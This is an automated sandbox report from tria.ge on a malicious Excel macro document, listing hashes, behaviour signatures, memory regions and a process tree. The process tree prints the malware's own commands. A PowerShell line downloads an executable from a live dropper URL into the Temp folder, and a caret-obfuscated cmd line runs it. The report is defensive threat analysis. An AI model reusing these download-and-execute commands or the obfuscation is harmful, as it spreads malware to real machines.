Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    31/12/2023, 06:37

General

  • Target

    2be7123060d0a3294b6fabff5553da30.xlsm

  • Size

    13KB

  • MD5

    2be7123060d0a3294b6fabff5553da30

  • SHA1

    a62e852b641ff566c41ef49ffb60b2cff377acdc

  • SHA256

    691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f

  • SHA512

    d5fdf9eef61e3f498f268285870b38c679b9f692f5ac74b269688a20691da8c660c35dcb05f1ff3b6e3e2c30d4b39dc983ce71dc0d32b168d1b1a998ff750856

  • SSDEEP

    192:cACGFE7x59/+OaFUlbVvevUqzvBh98CmU4Y/q49UFMuC3l18+wc+X:RFLUlM9zph98bU4Oyuuof8ke

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://iurl.vip/3osyi

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\2be7123060d0a3294b6fabff5553da30.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2948
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('http://iurl.vip/3osyi',$env:Temp+'\DoFPS.exe')
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2284
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c p^o^w^e^r^s^h^e^l^l.e^xe -w 1 Start-Sleep 10;%Temp%\DoFPS.exe
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2268
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -w 1 Start-Sleep 10;C:\Users\Admin\AppData\Local\Temp\DoFPS.exe
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2224

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    fb73569cb6a65a0db617f9022ef2d740

    SHA1

    ab37da4db35c544253853655c09e6d335bd165ab

    SHA256

    e4d8625335d8d360665979a2999f48d1a07192ee118598a92ba33697cccf2a56

    SHA512

    cadc1a0a6d91d9bf45f5f622ec3dcb7788dcf9ac0c2096f73078e3d4415e3f29d7e8afaea6452cc6c130f8cea6a81899c046c18979d876d559a9ddc170434ba4

  • memory/2224-10-0x000000006C6D0000-0x000000006CC7B000-memory.dmp

    Filesize

    5.7MB

  • memory/2224-20-0x000000006C6D0000-0x000000006CC7B000-memory.dmp

    Filesize

    5.7MB

  • memory/2224-15-0x0000000001D20000-0x0000000001D60000-memory.dmp

    Filesize

    256KB

  • memory/2224-16-0x0000000001D20000-0x0000000001D60000-memory.dmp

    Filesize

    256KB

  • memory/2224-13-0x000000006C6D0000-0x000000006CC7B000-memory.dmp

    Filesize

    5.7MB

  • memory/2224-11-0x0000000001D20000-0x0000000001D60000-memory.dmp

    Filesize

    256KB

  • memory/2284-17-0x0000000002CA0000-0x0000000002CE0000-memory.dmp

    Filesize

    256KB

  • memory/2284-18-0x0000000002CA0000-0x0000000002CE0000-memory.dmp

    Filesize

    256KB

  • memory/2284-12-0x0000000002CA0000-0x0000000002CE0000-memory.dmp

    Filesize

    256KB

  • memory/2284-9-0x000000006C6D0000-0x000000006CC7B000-memory.dmp

    Filesize

    5.7MB

  • memory/2284-14-0x000000006C6D0000-0x000000006CC7B000-memory.dmp

    Filesize

    5.7MB

  • memory/2284-19-0x000000006C6D0000-0x000000006CC7B000-memory.dmp

    Filesize

    5.7MB

  • memory/2948-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2948-1-0x00000000727AD000-0x00000000727B8000-memory.dmp

    Filesize

    44KB

  • memory/2948-21-0x00000000727AD000-0x00000000727B8000-memory.dmp

    Filesize

    44KB

  • memory/2948-23-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2948-24-0x00000000727AD000-0x00000000727B8000-memory.dmp

    Filesize

    44KB